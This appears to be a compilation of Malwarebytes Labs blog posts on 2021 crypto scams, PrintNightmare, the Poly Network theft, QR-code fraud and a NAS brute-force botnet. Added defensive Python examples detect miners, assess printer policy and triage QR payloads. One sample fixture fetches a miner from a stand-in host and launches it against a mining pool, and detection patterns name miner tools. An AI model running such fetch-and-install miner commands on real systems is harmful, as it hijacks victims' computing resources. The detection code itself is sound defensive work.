IT NEWS

Crypto-scams you should be steering clear of in 2021

A fair few cryptocurrency scams have been doing the rounds across 2021. Most of them are similar, if not identical, to tactics used in previous years, with the occasional twist. Here are some of the most visible ones you should be steering clear of.

Recovery code theft

Many Bitcoin wallets make use of something called recovery codes. These are, as the name suggests, codes allowing you to regain access to wallets you’ve locked yourself out of. These are the last roll of the dice for anyone unable to view their funds, and not a situation people would wish to find themselves in. As a result, they’re a fantastic target for scammers wanting to do some wallet plundering.

One of the sneakiest ways to grab a code is to jump into customer support discussions on social media. Scammers set up fake customer-support-style accounts, then direct potential victims to phishing pages hosted elsewhere. If you hand over a recovery code or its equivalent in this manner, the funds it protects are almost certainly gone for good. Always check that:

  • you are talking to the official support channel, and
  • you haven’t inadvertently started talking to someone else entirely who replied in the same thread.

By doing this, your digital funds should be kept safe from this technique. Remember, too, that no genuine support channel needs your recovery code to help you: being asked for it is the scam.

Fake Elon Musk cryptocurrency scams

Another social media shenanigan involving cryptocurrency? You bet. This tactic involves stealing verified Twitter accounts, making them resemble Elon Musk, and then spamming bogus Bitcoin offers in replies to viral tweets.

This has been happening for quite some time now, and refuses to go away. It’s not pocket change, either. The FTC estimates at least $2 million has been stolen from cryptocurrency investors. It’s not just happening on Twitter, either. Rogue SpaceX crypto scams were doing the rounds back in June of this year.

If in doubt, remember that Elon is not going to make you rich beyond your wildest dreams with Bitcoin.

Covert container mining

This one is a bit more technical than most, and relies on bad things happening behind the scenes. There’s no direct social engineering aspect, because that’d give the game away.

If you’re a developer working on a project, it’s common to build on pre-made components rather than writing everything yourself. There are all kinds of ways to give your project a leg up, but one of the most popular is Docker. Docker bundles up all the things your project needs (including operating system files, applications, and other people’s projects it depends upon) in a “container”, a self-contained, portable environment built from an image that anyone can publish. Because why write code if somebody’s already written it for you?

Turns out this area of work wasn’t safe from crypto-antics either. Rogue mining images involved in cloud-based mining attacks were discovered sitting on Docker Hub. The images contained software people might want to include in their Docker project, along with a cryptominer that would churn away in the background, making cryptocoins for somebody else at your expense.

This is a tricky one to avoid, but you can make a start by checking the list of image names which could indicate bad files ahoy here, by pulling images only from publishers you trust, and by pinning them to a specific digest rather than a floating tag so that a later upload cannot silently replace what you tested. 30 malicious images downloaded roughly 20 million times(!) equals an awful lot of potential mining activity taking place.
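Two controls that put that advice into practice, as an added example (this is not code from the article, from Docker or from the researchers who found the images): refuse image references that are not pinned to a digest, and scan the image’s layer history for the tell-tale signs of a miner. The image names, digests and history lines below are constructed for the demonstration, and the indicator list is a starting point rather than a complete one.

```python
"""Pre-pull checks for a container image: digest pinning and a layer-history
scan for cryptominer indicators. Added example; sample data is constructed."""
import re
from dataclasses import dataclass

# Indicators commonly left behind by cryptojacking images: the URL scheme used by
# Stratum mining pools, popular CPU-miner binaries, and a flag specific to XMRig.
MINER_PATTERNS = [
    ("stratum pool URL", re.compile(r"stratum\+(tcp|ssl)://", re.I)),
    ("miner binary", re.compile(r"\b(xmrig|minerd|cpuminer|cgminer)\b", re.I)),
    ("xmrig flag", re.compile(r"--donate-level", re.I)),
]

# name[:tag]@sha256:<64 hex chars>
DIGEST_RE = re.compile(r"^[^@\s]+@sha256:[0-9a-f]{64}$")


@dataclass
class Finding:
    layer: int      # index into the history list
    reason: str     # which indicator fired
    excerpt: str    # the offending command, truncated


def is_digest_pinned(ref: str) -> bool:
    """True if the image reference is pinned to a content digest rather than a
    mutable tag. A tag like ':latest' can be re-pointed at a different image."""
    return DIGEST_RE.match(ref) is not None


def scan_history(history_lines):
    """Return a Finding for every layer whose command matches a miner indicator.
    history_lines are the CREATED BY commands, oldest layer first."""
    findings = []
    for idx, line in enumerate(history_lines):
        for reason, pattern in MINER_PATTERNS:
            if pattern.search(line):
                findings.append(Finding(idx, reason, line.strip()[:80]))
                break  # one finding per layer is enough
    return findings


def allow_image(ref, history_lines):
    """Policy decision: the image must be digest-pinned and free of indicators."""
    return is_digest_pinned(ref) and not scan_history(history_lines)


# Constructed sample histories, in the style of `docker history --no-trunc`.
CLEAN_HISTORY = [
    "/bin/sh -c #(nop) ADD file:0c1e2f in /",
    "/bin/sh -c apt-get update && apt-get install -y nginx",
    '/bin/sh -c #(nop) CMD ["nginx" "-g" "daemon off;"]',
]
MINER_HISTORY = [
    "/bin/sh -c #(nop) ADD file:0c1e2f in /",
    "/bin/sh -c apt-get update && apt-get install -y nginx curl",
    "/bin/sh -c curl -sL http://updates.example.invalid/xmrig.tar.gz | tar xz -C /opt",
    '/bin/sh -c #(nop) ENTRYPOINT ["/opt/xmrig" "-o" "stratum+tcp://pool.example.invalid:3333" "--donate-level" "0"]',
]

if __name__ == "__main__":
    pinned = "registry.example/web/nginx@sha256:" + "a" * 64  # constructed digest
    for ref, hist in [("registry.example/web/nginx:latest", CLEAN_HISTORY),
                      (pinned, MINER_HISTORY)]:
        print(ref, "->", "allowed" if allow_image(ref, hist) else "REJECTED")
        for f in scan_history(hist):
            print(f"  layer {f.layer}: {f.reason}: {f.excerpt}")
```

In a real pipeline the history lines come from `docker history --no-trunc --format '{{.CreatedBy}}'` on the pulled image; the point of the digest check is that a clean scan result stays valid only for the exact bytes you scanned.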

419 crypto scam

Advance fee (419) fraud promises a windfall that never arrives; in the variant described here, dubious chunks of cash are routed to and from the victim’s bank account. The money vanishes without trace, the victim has been turned into a money mule, and is left carrying the blame.

We recently saw a mail along these lines. Nothing new there. However, this one asks victims to install a wallet app and transfer funds. This is not something you want to be doing. The scammers want people to get in touch on WhatsApp, where they may well ask for additional personal information. This could easily be used elsewhere in other scams.

Conclusion

There are many more crypto-scams waiting in the wings, but these are the ones we tend to see the most of. Give yourself a head start and learn to spot the signs of attempted compromise out there in the wild. Your digital wallet will thank you for it.

The post Crypto-scams you should be steering clear of in 2021 appeared first on Malwarebytes Labs.

Microsoft’s PrintNightmare continues, shrugs off Patch Tuesday fixes

I doubt if there has ever been a more appropriate nickname for a vulnerable service than PrintNightmare. There must be a whole host of people in Redmond having nightmares about the Windows Print Spooler service by now.

PrintNightmare is the name of a set of vulnerabilities that allow a standard user on a Windows network to execute arbitrary code on an affected machine (including domain controllers) as SYSTEM, allowing them to elevate their privileges as far as domain admin. Users trigger the flaw by simply feeding a vulnerable machine a malicious printer driver. The problem was made worse by confusion around whether PrintNightmare was a known, patched problem or an entirely new problem. In the end it turned out to be a bit of both.

What happened?

In June, Microsoft patched a vulnerability in the Windows Print Spooler that was listed as CVE-2021-1675. At first it was classified as an elevation of privilege (EoP) vulnerability, which means that someone with limited access to a system could raise their privilege level, giving them more power over the affected system. This type of vulnerability is serious, especially when it is found in a widely used service like the Windows Print Spooler. A few weeks after the patch Microsoft raised the level of seriousness to a remote code execution (RCE) vulnerability. RCE vulnerabilities allow a malicious actor to execute their code on a different machine over the network, without first needing a foothold on it.

In a rush to be the first to publish a proof-of-concept (PoC), researchers published a write-up and a demo exploit to demonstrate the vulnerability, only to find out they had alerted the world to a new 0-day vulnerability by accident. This vulnerability, listed as CVE-2021-34527, was introduced under the name PrintNightmare.

Ominously, the researchers behind PrintNightmare predicted that the Print Spooler, which has seen its fair share of problems in the past, would be a fertile ground for further discoveries.

At the beginning of July, Microsoft issued a set of out-of-band patches to fix this Windows Print Spooler RCE vulnerability. Soon enough, several researchers figured out that local privilege escalation (LPE) still worked. This means that threat actors and already active malware can still exploit the vulnerability to gain SYSTEM privileges. In a demo, Benjamin Delpy showed that the update failed to fix vulnerable systems that use certain settings for a feature called Point and Print, which makes it easier for network users to obtain the printer drivers they need.

On July 13 the Cybersecurity and Infrastructure Security Agency (CISA) issued Emergency Directive 21-04, “Mitigate Windows Print Spooler Service Vulnerability” because it became aware of multiple threat actors exploiting PrintNightmare.

Also in July, CrowdStrike identified Magniber ransomware attempting to use a known PrintNightmare vulnerability to compromise victims.

An end to the nightmare?

In the August 10 Patch Tuesday update, the Print Spooler service was subject to yet more patching, and Microsoft said that this time its patch should address all publicly documented security problems with the service.

In an unusual breaking change, one part of the update made admin rights required before using the Windows Point and Print feature.

Just one day later

On August 11, Microsoft released information about CVE-2021-36958, yet another 0-day that allows local attackers to gain SYSTEM privileges on a computer. Again, it was security researcher Benjamin Delpy who demonstrated the vulnerability, showing that threat actors can still gain SYSTEM privileges simply by connecting to a remote print server.

Mitigation

The workaround offered by Microsoft is stopping and disabling the Print Spooler service, although at this point you may be seriously considering a revival of the paperless office idea. So:

  • Disable the Print Spooler service on machines that do not need it. Please note that stopping the service without disabling it is not enough: a service that is merely stopped starts again at the next reboot.
  • For the systems that do need the Print Spooler service to be running, make sure they are not exposed to the Internet, and keep Point and Print driver installation restricted to administrators.
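A way to turn that checklist into something you can run across a fleet, as an added example (not the article’s code and not Microsoft’s): the function below takes the Point and Print policy values that Microsoft’s CVE-2021-34527 guidance tells administrators to check (NoWarningNoElevationOnInstall, UpdatePromptSettings and, since the August 2021 update, RestrictDriverInstallationToAdministrators, all DWORDs under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint), together with whether the host actually needs to print, and returns a verdict plus the actions to take. The registry reader only does anything on Windows; the sample hosts at the bottom are constructed.

```python
"""Assess a Windows host's Print Spooler exposure from its Point and Print
policy values. Added example; the sample hosts at the bottom are constructed."""
import sys

POINT_AND_PRINT_KEY = r"SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint"
POLICY_VALUES = (
    "NoWarningNoElevationOnInstall",               # 1 = install drivers without an elevation prompt
    "UpdatePromptSettings",                        # non-zero = suppress prompts on driver update
    "RestrictDriverInstallationToAdministrators",  # 0 = non-admins may install drivers
)


def read_point_and_print_policy():
    """Read the policy DWORDs from the local registry. Returns None off Windows
    and an empty dict when the key or values are not configured."""
    if sys.platform != "win32":
        return None
    import winreg  # standard library, Windows only
    values = {}
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, POINT_AND_PRINT_KEY) as key:
            for name in POLICY_VALUES:
                try:
                    values[name], _ = winreg.QueryValueEx(key, name)
                except FileNotFoundError:
                    pass  # value not configured: the default applies
    except FileNotFoundError:
        pass  # key absent: every value takes its default
    return values


def assess_point_and_print(values, spooler_needed):
    """values: dict of the policy DWORDs, missing entries meaning 'not configured'.
    spooler_needed: whether the host really has to print or serve printers.
    Returns (risk, actions) with risk one of 'high', 'medium', 'low'."""
    if not spooler_needed:
        return "low", ["Stop and disable the Print Spooler service; this host does not print."]

    actions = []
    # Defaults: prompts on (0) and, after the August 2021 update, driver
    # installation restricted to administrators unless explicitly set to 0.
    no_warn = values.get("NoWarningNoElevationOnInstall", 0)
    update_prompt = values.get("UpdatePromptSettings", 0)
    restrict = values.get("RestrictDriverInstallationToAdministrators", 1)

    if no_warn != 0 or update_prompt != 0:
        actions.append("Set NoWarningNoElevationOnInstall=0 and UpdatePromptSettings=0 "
                       "(or delete them); these values let standard users install "
                       "drivers silently, the configuration the July fix did not cover.")
    if restrict == 0:
        actions.append("Set RestrictDriverInstallationToAdministrators=1 (or delete "
                       "it) so only administrators can install printer drivers.")
    if actions:
        return "high", actions
    return "medium", ["Keep the host patched and off the Internet; the spooler "
                      "remains a SYSTEM-level attack surface even when hardened."]


# Constructed sample hosts: (policy values, does it need to print?)
SAMPLE_HOSTS = {
    "file-server":  ({}, False),
    "print-server": ({"NoWarningNoElevationOnInstall": 1, "UpdatePromptSettings": 2}, True),
    "relaxed-ws":   ({"RestrictDriverInstallationToAdministrators": 0}, True),
    "hardened-ws":  ({"NoWarningNoElevationOnInstall": 0}, True),
}

if __name__ == "__main__":
    live = read_point_and_print_policy()
    if live is not None:
        print("this host:", assess_point_and_print(live, spooler_needed=True))
    for host, (vals, needed) in SAMPLE_HOSTS.items():
        risk, todo = assess_point_and_print(vals, needed)
        print(f"{host}: {risk}")
        for item in todo:
            print("  -", item)
```

Run it under an account that can read HKLM on each host, or feed it values exported by your configuration management; a "high" result on a print server is the combination Delpy’s demo relied on.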

Microsoft says it is investigating the vulnerability and working on (yet another) security update.

Like I said yesterday: To be continued.


Thief pulls off colossal, $600m crypto-robbery …and gives the money back

The largest crypto-robbery in history is rapidly turning into the most bizarre as well. Let’s start at the beginning…

In an apparent scream for mercy, 21 hours ago the Poly Network Team reached out via Twitter to “hacker(s)” that had managed to transfer roughly $600 million in digital tokens out of its control and into separate cryptocurrency wallets.

It alerted the world to what looks like the biggest crypto-heist in history, dwarfing even the landmark Mt. Gox theft in 2014.

Dear Hacker,

We are the Poly Network team.

We want to establish communication with you and urge you to return the hacked assets.

The amount of money you hacked is the biggest one in the defi history. Law enforcement in any country will regard this as a major economic crime and you will be pursued. It is very unwise for you to do any further transactions. The money you stole is from tens of thousands of crypto community members, hence the people.

You should talk to us to work out a solution.

Poly Network Team

Poly Network describes itself as a project to “implement interoperability between multiple chains” and says it has already integrated Bitcoin, Ethereum, Neo, Ontology, Elrond, Ziliqa, Binance Smart Chain, Switcheo, and Huobi ECO Chain. What really matters, though, is that underneath all that it’s a service users can connect their cryptocurrency wallets to, something that makes both legitimate trading and theft much easier.

Insecure code

As with any exchange-type robbery (and they are many and frequent) there are cries of “inside job”. The Poly Network team says hackers exploited a vulnerability in its system to steal about $267m of Ether, $252m of Binance coins, and roughly $85 million in USDC tokens. According to Poly Network, a preliminary investigation found a hacker exploited a “vulnerability between contract calls” (contracts are code stored on blockchains).

Not long after the heist, SlowMist published a post on Medium explaining the vulnerability. Cutting to the chase, the important part of the analysis is this bit: “After replacing the address of the keeper role, the attacker can construct a transaction at will and withdraw any amount of funds from the contract.” The keeper is the privileged identity whose signature the contract trusts to authorise cross-chain transfers. In other words, the Poly Network code had a bug that let an attacker install their own key as that trusted identity and, from then on, sign themselves the owner of other people’s money.

Freezing accounts

Poly Network has blocklisted the addresses the cryptocurrency was transferred into. It said it is also working with its partners to freeze the hackers’ accounts. This is a step that can make it harder for the thieves to use stolen money. Cryptocurrency payments are pseudonymous, but they are not private: every transaction is traceable, and if every exchange agrees not to trade with blocklisted addresses they are, in effect, frozen.

Making it impossible for the thieves to move the stolen cryptocurrency would certainly make them more amenable to negotiation. After all, what is a full bank account worth if you can never hope to spend the money?

A rough time for cryptocurrencies

Like any technology, cryptocurrencies are neutral, neither intrinsically good nor bad, but they do have a way of attracting bad news. Poorly-secured exchanges, exit scams, pump-and-dump scams, inside jobs, and colossal thefts are part of the furniture. Cryptocurrencies are also popular for tax evasion and, of course, an essential part of the recent boom in ransomware.

Recently, we have seen a call to action from governments that want more oversight and control over cryptocurrencies. Their concern isn’t following where the money goes, that’s easy, but linking real identities to the pseudonymous addresses used in blockchain transactions.

Among those contributing to the mood music that “something must be done” about cryptocurrencies, the US senate is getting ready to vote on a bipartisan infrastructure package, which would impose more federal regulation on cryptocurrencies; the director of the Dutch economic advisory Centraal Planbureau (CPB) has argued that all cryptocurrencies should be banned; Turkey has banned cryptocurrencies as a legal form of payment; India is considering whether to make the mining and possession of cryptocurrencies illegal; and China has banned initial coin offerings and announced a crackdown on Bitcoin mining and trading.

Listening to the plea?

Poly Network provided the hacker with three addresses and, as it seems, the hackers have been busy returning some funds. At the time of writing they had returned less than 1 percent of the money.

You should be able to follow the developments in this thread on Twitter.

Update 11 August, 15:10 UTC. It gets weirder

Elliptic reports that the crypto-robber has now returned $258 million worth of cryptocurrency, suggesting that the crypto-robber may be serious about returning all the stolen money.

Negotiations between Poly Network and the thief started early and appear to be going well. Communicating via metadata on Ether transactions, the thief declared early on (about 12 hours ago) they were “NOT SO INTERESTED IN MONEY, NOW CONSIDERING RETURNING SOME TOKENS”.

The hacker sends a message to Poly Network in Ether transaction metadata.

In response, Poly Network offered an undisclosed “security bounty”, and dangled the carrot of notoriety, saying: “We want to offer a security bounty and we hope it will be remembered as the biggest white hat hack in the history.”

Seeming to prefer the role of hero over villain, the thief replied “IT’S ALREADY A LEGEND TO WIN SO MUCH FORTUNE. IT WILL BE AN ETERNAL LEGEND TO SAVE THE WORLD”.

As if that wasn’t weird enough, in a further bizarre twist, the thief has also declared they are taking donations, should anyone wish to thank them for returning all the money, or finding the bug, or something.


If a QR code leads you to a Bitcoin ATM at a gas station, it’s a scam

Rogue QR code antics have been back in the news recently. They’re not exactly a mainstay of fakery, but they do tend to enjoy small waves of popularity as events shaped by the real world remind everyone they still exist.

The most notable example where this is concerned is of course the pandemic. With the spread of Covid-19, people and organisations naturally wanted to move away from physical contact. Contactless cards were in, and so too were QR codes. This was fertile ground for scammers to move back into a patch they may have long since abandoned.

Even outside of scams, the use of QR codes as a safe way to do important things is questionable. The problem with QR codes stems from how easy they are to use. Point your smartphone’s camera at a QR code and your phone will happily read it, turn it into a URL, and open the URL in your browser, and the preview it shows first (if any) is easy to skim past. Very trusting.

What’s happening this time?

The Better Business Bureau are warning us to be on the lookout for QR code scams. The latest example they give is of a student sent a letter about loan consolidation. The letter contained links to an official .gov site, and also included “a barcode and QR code that looked legitimate”. Unfortunately once the victim contacted the scammers by phone, they were tricked into an eventual loss of just over a thousand dollars. You can see an older example of such a scam tactic here. Whether by QR code and bogus website or plain old unsolicited telephone call, the outcome is typically the same. Monthly fees going out of the victim’s bank account until they notice something is wrong.

Tracker tricks

We took a look at some of the recent examples listed in the BBB scam tracker. This is where people essentially crowdsource scams they encounter, adding them into the tracker database.

There was no common pattern between scam types, which ran the range from phishing and identity theft to employment fakeouts and bank imposters. With that in mind, here are the ones which caught our eye:

Trading for QR codes

One person claims they lost $5,100 after a stranger reached out on Instagram and convinced them to get into the wild world of forex (Foreign Exchange) trading. The discussion was moved to WhatsApp where a “withdrawal fee” of $4,102 was sent to a supplied QR code. When more requests for cash happened, the victim became suspicious.

A scam of utility

Another scam of note was related to utility services. A victim claims they were told their electricity would be turned off within 20 minutes. The only way to fix this was to pay an unpaid bill by going to a nearby gas station and sending $900 or so via a QR code. The QR code downloaded a Bitcoin app, and at that point they presumably became suspicious and went no further.

Of employment, supplies, and money muling

As you’ve seen, sending potential victims to gas stations to use Bitcoin ATMs is a popular technique. Perhaps the most shocking example we saw was along these same lines. The victim didn’t lose any money, but they did lose an awful lot of time, and experienced what must have been a lot of stress.

Our subject applied for a virtual job at a new organisation, after uploading their resume to a job hunt website. The entire job interview was performed using the secure messaging app Telegram, which is somewhat unusual. They sent their supposed new employers a copy of their driving license and other personal information. The victim was then sent $5,000 to “purchase equipment” for their job, and instructed to send $4,800 to their “software vendor’s” Bitcoin address via a gas station ATM.

It wasn’t long before they were given the cold shoulder by the people asking them to receive and send money. They had almost certainly been used as a money mule: Laundering dubious funds by breaking the link between the sender and the recipient, thanks to the gas station ATM.

In most cases, the QR code isn’t some sort of surprise gotcha. Nothing leaps out at the victim and drops malware, or pops something terrible on the desktop. No, the scammers are using them the same way regular folks do—for convenience. They’re simply a means of getting the victim in front of an ATM. From there, they set the ball rolling to part them from their money (or have them act as the conduit for ill-gotten gains).

Avoiding QR scams

If you’re dealing with QR codes in public, on ads or posters, check that they haven’t been tampered with (look for stickers with a new QR code placed over an original).

QR codes in correspondence can be trickier. The trick is to remember that a QR code is easy to create and is no more trustworthy than any other word or web address. When dealing with codes from businesses you’ve dealt with, try to confirm the code is genuine. If the code opens a website asking for login details, confirm that it’s the company’s legitimate address. Asking for logins from QR codes is risky behaviour and should really be avoided whether a real code or not.

And if anyone tries to steer you towards a Bitcoin ATM, move swiftly in the opposite direction.
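One way to apply the rule that a QR code is no more trustworthy than any other address, as an added example (this is not code from the article or from the BBB): decode the code with whatever scanner you like, then run the raw payload through the triage below before you tap it. It assumes you know which company domain the code should lead to (the expected_hosts argument) and flags the tricks that show up in QR scams: cryptocurrency payment URIs, credentials in front of an @ that hide the real host, bare IP addresses, punycode lookalikes, and “company.com” sitting inside somebody else’s domain. The payloads at the bottom are constructed; the address in the bitcoin: URI is not a real one.

```python
"""Triage the text decoded from a QR code before acting on it.
Added example; the sample payloads are constructed."""
import ipaddress
from urllib.parse import urlsplit

# Payload prefixes that are not web links but still trigger an action.
PAYMENT_SCHEMES = ("bitcoin:", "ethereum:", "litecoin:")
ACTION_SCHEMES = ("wifi:", "tel:", "sms:", "smsto:", "mailto:")


def registrable_match(host, expected):
    """True if host is expected or a subdomain of it (example.com, login.example.com)."""
    return host == expected or host.endswith("." + expected)


def triage_qr_payload(payload, expected_hosts=()):
    """Return (verdict, reasons). verdict is 'block', 'warn' or 'ok'.
    expected_hosts: domains the code is supposed to lead to, e.g. ('example.com',)."""
    text = payload.strip()
    lower = text.lower()
    expected = [h.lower() for h in expected_hosts]

    if lower.startswith(PAYMENT_SCHEMES):
        return "block", ["cryptocurrency payment URI: no bill, employer or lender "
                         "is paid through a crypto wallet or ATM"]
    if lower.startswith(ACTION_SCHEMES):
        scheme = lower.split(":", 1)[0]
        return "warn", [f"non-web action ({scheme}): confirm the number, address "
                        "or network against a known source"]
    if not lower.startswith(("http://", "https://")):
        return "warn", ["not a web URL; treat as untrusted text"]

    parts = urlsplit(text)
    host = (parts.hostname or "").lower()
    block, warn = [], []

    if parts.username is not None or parts.password is not None:
        block.append(f"credentials before '@' disguise the real host ({host})")
    try:
        ipaddress.ip_address(host)
        warn.append("bare IP address instead of a domain name")
    except ValueError:
        pass
    if host.startswith("xn--") or ".xn--" in host or any(ord(c) > 127 for c in host):
        warn.append("internationalised/punycode host: possible lookalike domain")
    if parts.scheme == "http":
        warn.append("plain HTTP: anything you type is sent unencrypted")
    if expected and not any(registrable_match(host, e) for e in expected):
        lookalikes = [e for e in expected if e in host]
        if lookalikes:
            block.append(f"'{lookalikes[0]}' appears inside a different domain: {host}")
        else:
            block.append(f"host {host} is not the expected domain ({', '.join(expected)})")

    if block:
        return "block", block + warn
    if warn:
        return "warn", warn
    return "ok", []


# Constructed sample payloads: (decoded text, domain the code claims to be for)
SAMPLES = [
    ("https://login.example.com/account", ("example.com",)),
    ("https://example.com.accounts-verify.test/login", ("example.com",)),
    ("https://example.com@203.0.113.5/login", ("example.com",)),
    ("http://203.0.113.5/pay", ()),
    ("bitcoin:bc1qexampleaddressnotreal?amount=0.02", ()),
    ("WIFI:T:WPA;S:cafe;P:secret;;", ()),
]

if __name__ == "__main__":
    for payload, hosts in SAMPLES:
        verdict, reasons = triage_qr_payload(payload, hosts)
        print(f"{verdict:5} {payload}")
        for r in reasons:
            print("      -", r)
```

The “block” verdicts are the ones that matter: a payment URI where a web page was expected, or a page that merely contains the company name, is the pattern behind every story in the tracker above. Everything else is a prompt to look harder, not a proof of safety.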

Follow these rules and you’ll hopefully avoid any code-based pitfalls.


Twitter says it out loud: Removing anonymity will not stop online abuse

An investigation by Twitter into racist tweets levied against three Black players on the English football team following the national hopefuls’ loss against Italy last month revealed that anonymity played almost no role in whether users posted abusive comments from their accounts.

The analysis, which revealed that 99 percent of the accounts that Twitter suspended were not anonymous, provides the latest evidence that requiring real identities on social media platforms will not lead to any measurable decrease in online abuse.

“While we have always welcomed the opportunity to hear ideas from partners on what will help, including from within the football community, our data suggests that ID verification would have been unlikely to prevent the abuse from happening – as the accounts we suspended themselves were not anonymous,” Twitter UK wrote in a blog post. “Of the permanently suspended accounts from the Tournament, 99% of account owners were identifiable.”

According to Twitter, its own automated tools to find and remove abusive content are working: The company’s internal tech tools found and removed 1,662 harmful tweets during the UEFA Euro 2020 Final and in the 24 hours following the match. By July 14—three days after the final—that number grew to 1,961, though the total included 126 tweets that were removed due to non-automated reporting by “trusted partners,” Twitter said.

The racism directed against England’s players drew immediate attention after the team’s loss in one of the most anticipated football matches in the country’s recent history. As the match closed with a 1 – 1 tie, three of England’s players shot penalty kicks. All three missed.

According to Vice, the three penalty kickers were called racist slurs on Instagram, faced racist comments on Twitter, and received “direct threats to their safety, in far-right and neo-Nazi channels” on Telegram.

The proposed solutions to this type of abuse are as old as the abuse itself. As we discussed on the Lock and Code podcast with Electronic Frontier Foundation Director of Cybersecurity Eva Galperin, commentators often suggest that social media companies require a person to provide their real identity when creating an account and using a platform.

“The premise is that if people used their real names that they would not post this kind of harassing content,” Galperin said. “That if your name was next to every opinion you had, that you would be more careful about the things that you say online.”

But, Galperin said, the premise falls apart when looking at the real world.

“This assumes a level of shame that is simply not there,” Galperin said. “People are willing to be tremendous jerks online. And the more powerful that they are offline, the more likely it is that they will act as bullies online and that they will put their names next to it and feel no shame whatsoever.”

Now, after decades of this dynamic being recognized by online privacy experts, it appears that Twitter has joined the crowd that says that, thankfully, anonymity is not worth destroying.


PrintNightmare and RDP RCE among major issues tackled by Patch Tuesday

The sheer number of patches (44 security vulnerabilities) should be enough to scare us, but unfortunately we have gotten used to those numbers. In fact, 44 is a low number compared to what we have seen on recent Patch Tuesdays. So what are the most notable vulnerabilities that were patched?

  • One actively exploited vulnerability
  • One vulnerability that has a CVSS score of 9.9 out of 10
  • And yet another attempt to fix PrintNightmare

Let’s go over these worst cases to get an idea of what we are up against.

CVEs

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).

Actively exploited

CVE-2021-36948 is an elevation of privilege (EoP) vulnerability in the Windows Update Medic Service. The Windows Update Medic Service is a background service that was introduced with Windows 10 and handles the updating process. Its only purpose is to repair the Windows Update service so that your PC can continue to receive updates unhindered. Besides Windows 10, it also runs on Windows Server 2019. According to Microsoft, CVE-2021-36948 is being actively exploited, but it is not aware of publicly available exploit code. Reportedly, the exploit is both low complexity and requires no user interaction, making this an easy vulnerability to include in an adversary’s toolbox. The bug is only locally exploitable, but local elevation of privilege is exactly what ransomware gangs will be looking to do after breaching a network, for example.

9.9 out of 10

CVE-2021-26424 is a Remote Code Execution (RCE) vulnerability in Windows TCP/IP. It is remotely exploitable by a malicious Hyper-V guest sending an IPv6 ping to the Hyper-V host: an attacker could send a specially crafted TCP/IP packet to its host. The vulnerability exists in the TCP/IP protocol stack of Windows 7 and newer Microsoft operating systems, including servers.

This vulnerability received a CVSS score of 9.9 out of 10. The CVSS standards are used to help security researchers, software users, and vulnerability tracking organizations measure and report on the severity of vulnerabilities. CVSS can also help security teams and developers prioritize threats and allocate resources effectively.

9.8 out of 10

Another high scorer is CVE-2021-26432, an RCE in the Windows Services for NFS ONCRPC XDR Driver. Open Network Computing (ONC) Remote Procedure Call (RPC) is a remote procedure call system. ONC was originally developed by Sun Microsystems. The NFS protocol is independent of the type of operating system, network architecture, and transport protocols. The Windows service for the driver makes sure that Windows computers can use this protocol. This vulnerability got a high score because it is known to be easy to exploit and can be initiated remotely.

More RDP

CVE-2021-34535 is an RCE in the Remote Desktop Client. Microsoft lists two exploit scenarios for this vulnerability:

  • In the case of a Remote Desktop connection, an attacker with control of a Remote Desktop Server could trigger a remote code execution (RCE) on the machine when a victim connects to the attacking server with the vulnerable Remote Desktop Client.
  • In the case of Hyper-V, a malicious program running in a guest VM could trigger guest-to-host RCE by exploiting this vulnerability in the Hyper-V Viewer when a victim running on the host connects to the attacking Hyper-V guest.

Since this is a client-side vulnerability, an attacker would have to convince a user to authenticate to a malicious RDP server, where the server could then trigger the bug on the client side. Combined with other RDP weaknesses however, this vulnerability would be easy to chain into a full system take-over.

Never-ending nightmare of PrintNightmare

The Print Spooler service was subject to yet more patching. The researchers behind PrintNightmare predicted that it would be a fertile ground for further discoveries, and they seem to be right. I’d be tempted to advise Microsoft to start from scratch instead of patching patches on a very old chunk of code.

CVE-2021-36936 is an RCE vulnerability in Windows Print Spooler. It was publicly disclosed, and may be related to several bugs in Print Spooler that were identified by researchers over the past few months (presumably PrintNightmare).

CVE-2021-34481 and CVE-2021-34527 are RCE vulnerabilities that could allow attackers to run arbitrary code with SYSTEM privileges.

Microsoft said the Print Spooler patch it pushed this time should address all publicly documented security problems with the service. In an unusual step, it has made a breaking change: “Today we are addressing this risk by changing the default Point and Print driver installation and update behavior to require administrator privileges.”

To be continued, we suspect.


Check your passwords! Synology NAS devices under attack from StealthWorker

Synology PSIRT (Product Security Incident Response Team) has put out a warning that it has recently seen and received reports about an increase in brute-force attacks against Synology devices. PSIRT suspects the botnet commonly known as StealthWorker is responsible for this increase in activity.

Synology

Synology specializes in data storage and most people will know it because of its Network Attached Storage (NAS) devices. These NAS devices seem to be what the botnet is targeting. The company does not believe the botnet is exploiting vulnerabilities in its software; it’s simply going after weak or default passwords using brute force guessing.

In a brute force guessing attack, software attempts to find a device’s password with a bit of educated guesswork (typically by using a list of known, common passwords). It tries a password, sees if it works, and if it doesn’t, tries another, and another, and another, until it either guesses a password correctly or exhausts its list and moves on.

In this case, if a password is guessed successfully, the device is infected with malware that will carry out additional attacks on other devices.

StealthWorker

We reported on Trojan.StealthWorker.GO in February 2019, when it emerged as a brute forcer written in Golang that was involved in a rise in attacks against e-commerce websites. Golang is a statically-typed, compiled, general-purpose programming language that we see more and more often in the current malware landscape. Shortly after its run against CMS platforms, StealthWorker started to target Linux and Windows machines.

In June 2020, Akamai researchers uncovered a malware campaign spreading Golang-based malicious code that was also attributed to StealthWorker. It was found targeting Windows and Linux servers running popular web services and platforms like WordPress, Drupal, Joomla, and Magento. One significant factoid discovered back then was that cleaning the compromised system was not enough. It would be re-infected within minutes if the password stayed the same. This would indicate either a very efficient brute-force technique or, perhaps more likely, the use of a method to store and retrieve passwords that were once guessed right.

Once deployed on a compromised machine, the malware creates scheduled tasks on both Windows and Linux to gain persistence and, as Synology warned, then deploys second-stage malware payloads. Botnets can be used to spread other malware like cryptojackers and ransomware. Or your device can be used in DDoS or click-fraud campaigns. On CMS platforms the botnet can equip a compromised e-commerce website with an embedded skimmer that steals personal information and payment details when unsuspecting customers enter them into the website.

Mitigation

Synology says it is working with multiple CERT organizations worldwide in an attempt to locate and take down the botnet’s command and control servers.

Synology recommends that all users check their system for weak administrative credentials and change them if necessary. Synology also recommends enabling auto block and account protection. Finally, you should set up multi factor authentication (MFA) where possible.
